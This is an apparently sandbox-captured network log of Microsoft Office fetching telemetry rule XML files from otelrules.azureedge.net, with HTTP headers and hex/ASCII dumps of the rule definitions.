                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Cache-Control: public
                                                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 30 Oct 2024 23:56:08 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DCF93E6CAB67A0"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 3ed0e151-601e-0032-5264-2beebb000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182000Z-16849878b78fhxrnedubv5byks000000088g00000000934z
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:00 UTC15823INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:00 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <S T="1" F="0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L>
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:00 UTC16384INData Raw: 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d
                                                                                                                                                                                                                                                                                                                      Data Ascii: <S T="3" /> </T> <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:00 UTC16384INData Raw: 6e 74 73 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a
                                                                                                                                                                                                                                                                                                                      Data Ascii: nts" /> </C> <C T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" />
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:00 UTC16384INData Raw: 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: </S> <C T="U32" I="0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32"
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:00 UTC16384INData Raw: 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: _Count"> <C> <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:00 UTC16384INData Raw: 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22
                                                                                                                                                                                                                                                                                                                      Data Ascii: <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3"
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:00 UTC16384INData Raw: 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65
                                                                                                                                                                                                                                                                                                                      Data Ascii: </L> <R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:00 UTC16384INData Raw: 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: T="B" /> </R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" />
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:00 UTC16384INData Raw: 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                                                                                                                                                                      Data Ascii: O> </F> <F T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      91192.168.2.45125713.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:01 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:01 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:01 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 2160
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: fc6998d3-101e-008d-52ad-2692e5000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182001Z-16849878b78zqkvcwgr6h55x9n00000009dg000000004rp3
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:01 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      92192.168.2.45125813.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:01 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:01 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 408
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 11ae3112-301e-005d-596b-27e448000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182001Z-16849878b787bfsh7zgp804my400000008pg00000000ge8z
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:01 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      93192.168.2.45125913.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:01 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:01 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 450
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 54e1ad71-801e-008f-48b2-272c5d000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182001Z-17c5cb586f6fqqst87nqkbsx1c000000089g00000000h2py
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:01 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                      94192.168.2.45125613.107.246.45443
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:01 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:20:01 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:20:01 GMT
                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                      Content-Length: 2980
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 834668b8-301e-0052-121c-2765d6000000
                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T182001Z-16849878b7828dsgct3vrzta7000000008a000000000eqe5
                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
